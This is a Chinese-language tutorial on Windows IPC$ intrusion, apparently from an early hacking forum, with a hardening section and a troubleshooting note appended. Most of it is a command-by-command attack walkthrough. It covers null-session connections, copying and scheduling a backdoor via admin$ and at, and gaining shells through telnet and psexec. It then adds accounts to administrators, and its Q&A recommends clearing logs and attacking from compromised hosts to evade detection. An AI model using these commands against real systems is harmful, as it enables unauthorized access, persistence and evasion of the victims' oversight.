关于 at 命令和 xp 对 ipc$ 的限制

九 关于 at 命令和 xp 对 ipc$ 的限制
本来还想说一下用 at 远程运行程序失败的原因，但考虑到 at 的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用 psexec.exe 远程运行程序，假设想要远程机器执行本地 c:\xinxin.exe 文件，且管理员为 administrator ，密码为 1234 ，那么输入下面的命令：
psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已经建立 ipc 连接，则 -u -p 这两个参数不需要， psexec.exe 将自动拷贝文件到远程机器并运行。
本来 xp 中的 ipc$ 也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到 xp 的时候，大部分操作都很难成功。我在这里就简单提一下吧，在 xp 的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和密码，你所得到的权限也只是 Guest ，因此大部分操作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了 xp 的管理员密码，我建议你尽量避开 ipc 管道。
十 如何打开目标的 IPC$ 共享以及其他共享
目标的 ipc$ 不是轻易就能打开的，否则就要天下打乱了。你需要一个 admin 权限的 shell ，比如 telnet ，木马， cmd 重定向等，然后在 shell 下执行：
net share ipc$
开放目标的 ipc$ 共享；
net share ipc$ /del
关闭目标的 ipc$ 共享；如果你要给它开共享文件夹，你可以用：
net share xinxin=c:\
这样就把它的 c 盘开为共享名为 xinxin 共享文件夹了。（可是我发现很多人错误的认为开共享文件夹的命令是 net share c$ ，还大模大样的给菜鸟指指点点，真是误人子弟了）。再次声明，这些操作都是在 shell 下才能实现的。
十一 一些需要 shell 才能完成的命令
看到很多教程这方面写的十分不准确，一些需要 shell 才能完成命令就简简单单的在 ipc$ 连接下执行了，起了误导作用。那么下面我总结一下需要在 shell 才能完成的命令：
1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在 shell 下完成；
2 打开远程主机的 ipc$ 共享，默认共享，普通共享的操作需要在 shell 下完成；
3 运行 / 关闭远程主机的服务，需要在 shell 下完成；
4 启动 / 杀掉远程主机的进程，也需要在 shell 下完成（用软件的情况下除外，如 pskill ）。
十二 入侵中可能会用到的命令
为了这份教程的完整性，我列出了 ipc$ 入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的 shell （如 cmd ， telnet 等）后，才能向远程主机执行。
1 建立 / 删除 ipc$ 连接的命令
1 ）建立空连接 :
net use \\127.0.0.1\ipc$ "" /user:""
2 ）建立非空连接 :
net use \\127.0.0.1\ipc$ " 密码 " /user:" 用户名 "
3 ）删除连接 :
net use \\127.0.0.1\ipc$ /del
2 在 ipc$ 连接中对远程主机的操作命令
1 ） 查看远程主机的共享资源（看不到默认共享） :
net view \\127.0.0.1
2 ） 查看远程主机的当前时间 :
net time \\127.0.0.1
3 ） 得到远程主机的 netbios 用户名列表 :
nbtstat -A 127.0.0.1
4 ）映射 / 删除远程共享 :
net use z: \\127.0.0.1\c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del
删除映射的 z 盘，其他盘类推
5 ）向远程主机复制文件 :
copy 路径 \ 文件名 \\IP\ 共享目录名，如：
copy c:\xinxin.exe \\127.0.0.1\c$ 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内
当然，你也可以把远程主机上的文件复制到自己的机器里：
copy \\127.0.0.1\c$\xinxin.exe c:\
6 ）远程添加计划任务 :
at \\IP 时间 程序名 如：
at \\127.0.0.0 11:00 xinxin.exe
注意：时间尽量使用 24 小时制；如果你打算运行的程序在系统默认搜索路径（比如 system32/ ）下则不用加路径，否则必须加全路径
3 本地命令
1 ）查看本地主机的共享资源（可以看到本地的默认共享）
net share
2 ）得到本地主机的用户列表
net user
3 ）显示本地某用户的帐户信息
net user 帐户名
4 ）显示本地主机当前启动的服务
net start
5 ）启动 / 关闭本地服务
net start 服务名
net stop 服务名
6 ）在本地添加帐户
net user 帐户名 密码 /add
7 ）激活禁用的用户
net uesr 帐户名 /active:yes
8 ）加入管理员组
net localgroup administrators 帐户名 /add
很显然的是，虽然这些都是本地命令，但如果你在远程主机的 shell 中输入，比如你 telnet 成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。
4 其他一些命令
1 ） telnet
telnet IP 端口
telnet 127.0.0.0 23
2 ）用 opentelnet.exe 开启远程主机的 telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求：
1 ）目标开启了 ipc$ 共享
2 ）你要拥有管理员密码和帐号
3 ）目标开启 RemoteRegistry 服务，用户就可以更改 ntlm 认证
4 ）对仅 WIN2K/XP 有效
3 ）用 psexec.exe 一步获得 shell ，需要 ipc 管道支持
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的 ipc$ 入侵
既然是对比，那么我就先把过去的 ipc$ 入侵步骤写给大家，都是蛮经典的步骤：
[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\ 用扫到的空口令建立连接　　
[2]
c:\>net view \\127.0.0.1
\\ 查看远程的共享资源
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\ 将一次性后门 srv.exe 复制到对方的系统文件夹下，前提是 admin$ 开启　　
[4]
C:\>net time \\127.0.0.1
\\ 查看远程主机的当前时间
[5]
C:\>at \\127.0.0.1 时间 srv.exe
\\ 用 at 命令远程运行 srv.exe ，需要对方开启了 'Task Scheduler' 服务　　
[6]
C:\>net time \\127.0.0.1
\\ 再次查看当前时间来估算 srv.exe 是否已经运行，此步可以省略
[7]
C:\>telnet 127.0.0.1 99
\\ 开一个新窗口，用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思？那你就把它想象成远程机器的控制权就好了，操作像 DOS) ， 99 端口是 srv.exe 开的一次性后门的端口　　
[8]
C:\WINNT\system32>net start telnet
\\ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务，毕竟 srv.exe 是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的 telnet 已经启动，此步可省略
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\ 在原来那个窗口中将 ntlm.exe 传过去， ntlm.exe 是用来更改 telnet 身份验证的　　
[10]
C:\WINNT\system32>ntlm.exe
\\ 在 shell 窗口中运行 ntlm.exe ，以后你就可以畅通无阻的 telnet 这台主机了
[11]
C:\>telnet 127.0.0.1 23
\\ 在新窗口中 telnet 到 127.0.0.1 ，端口 23 可省略，这样我们又获得一个长期的后门
[12]
C:\WINNT\system32>net user 帐户名 密码 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帐户名 /add
\\telnet 上以后，你可以建立新帐户，激活 guest ，把任何帐户加入管理员组等
好了，写到这里我似乎回到了 2 ， 3 年前，那时的 ipc$ 大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的 ipc$ 入侵吧。
[1]
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
\\ 用这个工具我们可以一步到位的获得 shell
OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port
\\ 用它可以方便的更改 telnet 的验证方式和端口，方便我们登陆
[2]
已经没有第二步了，用一步获得 shell 之后，你做什么都可以了，安后门可以用 winshell ，克隆就用 ca 吧，开终端用 3389.vbe ，记录密码用 win2kpass ，总之好的工具不少，随你选了，我就不多说了。
十四 如何防范 ipc$ 入侵
1 禁止空连接进行枚举 ( 此操作并不能阻止空连接的建立 )
运行 regedit ，找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] 把 RestrictAnonymous = DWORD 的键值改为： 1
如果设置为 "1" ，一个匿名用户仍然可以连接到 IPC$ 共享，但无法通过这种连接得到列举 SAM 帐号和共享信息的权限；在 Windows 2000 中增加了 "2" ，未取得匿名权的用户将不能进行 ipc$ 空连接。建议设置为 1 。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－ ' 对匿名连接的额外限制 '
2 禁止默认共享
1 ）察看本地共享资源
运行 -cmd- 输入 net share
2 ）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete （如果有 e,f, ……可以继续删除）
3 ）停止 server 服务
net stop server /y （重新启动后 server 服务会重新开启）
4 ）禁止自动打开默认共享（此操作并不能关闭 ipc$ 共享）
运行 -regedit
server 版 : 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareServer （ DWORD ）的键值改为 :00000000 。
pro 版 : 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareWks （ DWORD ）的键值改为 :00000000 。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。
3 关闭 ipc$ 和默认共享依赖的服务 :server 服务
如果你真的想关闭 ipc$ 共享，那就禁止 server 服务吧：
控制面板 - 管理工具 - 服务 - 找到 server 服务（右击） - 属性 - 常规 - 启动类型 - 选已禁用，这时可能会有提示说： XXX 服务也会关闭是否继续，因为还有些次要的服务要依赖于 server 服务，不要管它。
4 屏蔽 139 ， 445 端口
由于没有以上两个端口的支持，是无法建立 ipc$ 的，因此屏蔽 139 ， 445 端口同样可以阻止 ipc$ 入侵。
1 ） 139 端口可以通过禁止 NBT 来屏蔽
本地连接－ TCP/IT 属性－高级－ WINS －选‘禁用 TCP/IT 上的 NETBIOS '一项
2 ） 445 端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器
注意：如果屏蔽掉了以上两个端口，你将无法用 ipc$ 入侵别人。
3 ）安装防火墙进行端口过滤
6 设置复杂密码，防止通过 ipc$ 穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。
十五 ipc$ 入侵问答精选
上面说了一大堆的理论东西，但在实际中你会遇到各种各样的问题，因此为了给予大家最大的帮助，我整理了各大安全论坛中一些有代表性的问答，其中的一些答案是我给出的，一些是论坛上的回复，如果有什么疑问，可以来找我讨论。
1. 进行 ipc$ 入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？
答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。
2. 你看下面的情况是为什么，可以连接但不能复制
net use \\***.***.***.***\ipc$ " 密码 " /user:" 用户名 "
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功
答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。
3. 如果对方开了 IPC$ ，且能建立空联接，但打开 C 、 D 盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？
答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。
4. 我已经猜解到了管理员的密码，且已经 ipc$ 连接成功了，但 net view \\ip 发现它没开默认共享，我该怎么办？
答：首先纠正你的一个错误，用 net view \\ip 是无法看到默认共享的，你可以试着将文件复制到 c$ ， d$ 看看，如果都不行，说明他关闭了默认共享，那你就用 opentelnet.exe 或 psexec.exe 吧，用法上面有。
5.ipc$ 连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add
答： ipc$ 建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个 shell ，只有在获得一个 shell （比如 telnet ）之后，你才能在远程机器建立一个帐户，否则你的操作只是在本地进行。
6. 我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制 0 个文件”，是不是对方有什么服务没开，我该怎么办？
答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。
7. 我用 Win98 能与对方建立 ipc$ 连接吗？
答：理论上不可以，要进行 ipc$ 的操作，建议用 win2000 ，用其他操作系统会带来许多不必要的麻烦。
8. 我用 net use \\ip\ipc$ "" /user "" 成功的建立了一个空会话，但用 nbtstat -A IP 却无法导出用户列表，这是为什么？
答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的 NBT 没有打开， netstat 命令是建立在 NBT 之上的。　　
9. 我建立 ipc$ 连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突'，怎么回事？
答：呵呵，这说明你已经与目标主机建立了 ipc$ 连接，两个主机间同时建立两个 ipc$ 连接是不允许的。
10. 我在映射的时候出现：
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？
答：你也太粗心了吧，这说明你有一个 h 盘了，映射到没有的盘符吧！
11. 我建立了一个连接 f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码 :
系统发生 5 错误。
拒绝访问。
答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射 C$ 这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。
12. 我用 superscan 扫到了一个开了 139 端口的主机，但为什么不能空连接呢？
答：你混淆了 ipc$ 与 139 的关系，能进行 ipc$ 连接的主机一定开了 139 或 445 端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭 ipc$ 共享 .
13. 我们局域网里的机器大多都是 xp ，我用流光扫描到几个 administrator 帐号口令是空，而且可以连接，但不能复制东西，说错误 5 。请问为什么？
答： xp 的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误 5 ：权限不够。
14. 我用 net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？
答：虽然你具有管理员权限，但管理员在设置 c 盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许 administrator 访问，所以会出现上述问题。
15. 如果自己的机器禁止了 ipc$, 是不是还可以用 ipc$ 连接别的机器？如果禁止 server 服务呢？
答：禁止以上两项仍可以发起 ipc$ 连接，不过这种问题自己动手试验会更好。
16. 能告诉我下面的两个错误产生的原因吗？
c:\>net time \\61.225.*.*
系统发生 5 错误。
拒绝访问。
c:\>net view \\61.225.*.*
系统发生 5 错误。
拒绝访问。
答：起初遇到这个问题的时候我也很纳闷，错误 5 表示权限不够，可是连空会话的权限都可以完成上面的两个命令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了 ipc$ 连接，之后他又输入了上面那两个命令，随之发生了错误 5 。
17. 您看看这是怎么回事？
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。
答：答案很简单，你的命令错了，应该是 net time \\ip
没输入 ip 地址，当然找不到服务器。 view 的命令也应该有 ip 地址，即： net view \\ip
最后还要说一点，许多朋友提问题总是简单了事，也不描述一下具体情况就喊救命，起码应该把错误的命令拿出来，这样好让别人给你分析，否则你只说“我不能复制文件”，天晓得你是怎么回事，要知道别人给你回答问题也需要花时间的，把时间浪费在这种问题上，谁会觉得值得？而你却还在喊“怎么没人理我呀”。
十六 结束的话
可以坦白的说这篇文章的技术含量不高，我的侧重点在解惑，更希望大家能有一种理智的刨根问题的精神，我在论坛上总会看到一些人，他们回答别人的问题也很不负责任，一遇到稍有难度或自己不会的问题就告诉人家是因为有防火墙或是权限不够，从来都不愿意去认真的把问题分析一下，我觉得这种风气是要不得的：）最后，希望我的文章能对大家有所帮助，祝大家旅途愉快。 



什么是ipc$

ipc$空会话是一种很常见的入侵模式！

简单的介绍一下什么是ipc$

在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，如果建立成功将成为一个安全隧道，建立双方通过它互通信息

一些常用的命令

建立连接

net use \ \ip\ ipc$ "" /user:"" -------------------建立连接

net view \ \IP --------------------查看远程主机的共享

net time \ \IP --------------------查看远程主机的时间

nbtstat -A IP --------------------查看远程主机用户名列表


防止方法

1 禁止空连接进行枚举(此*作并不能阻止空连接的建立)

运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1
如果设置为"1"，一个匿名可以连接到IPC$共享，但限制通过这种连接得到列举SAM帐号和共享等信息；在Windows 2000 中增加了"2"，限制所有匿名访问除非特别授权，如果设置为2的话,可能会有一些其他问题发生，建议设置为1。

或在本地安全设置－本地策略－安全选项－在'对匿名连接的额外限制'中做相应设置
2 禁止默认共享
察看本地共享资源
运行-cmd-输入net share
删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
停止server服务
net stop server /y （重新启动后server服务会重新开启）
禁止自动打开默认共享（此*作并未关闭ipc$共享）
运行-regedit
找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加。
3 关闭ipc$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用
这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于lanmanserver，不要管它。
4 屏蔽139，445端口
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。
5 设置复杂密码，防止通过ipc$穷举出密码
***********************************
net use x: \\192.168.0.102\admin$ password /user:local\username

net use x: \\192.168.0.102\C$ password /user:local\username

提示53号错误，找不到网络路径，

psexec \\192.168.0.102 -u local\username -p password cmd

连接不上，提示拒绝访问，或者找不到网络路径

而用户名密码又都正确，命令行里输入：\\192.168.0.102，用户名:local\username，密码:password  可以访问，

可以在要连接的电脑上命令行输入：

net share IPC$， net share admin$，（net share C$，net share 各个盘符，可选）打开默认共享；

然后打开我的电脑，工具，文件夹选项，查看，取消“使用简单文件共享（推荐）”前面的对勾；

使用pstools连接应该可以了，如果pslist连接不上，提示RPC服务未打开，可以用psexec命令连接对方电脑之后，

在对方电脑上运行cmd命令，执行 net start rpcss，启动RPC服务，

就应该可以了

如果psexec连接不上，可以先连接

net use x: \\192.168.0.102\admin$ password /user:local\username

或者

net use x: \\192.168.0.102\C$ password /user:local\username

然后再用psexec连接，应该可以了，

祝你好运！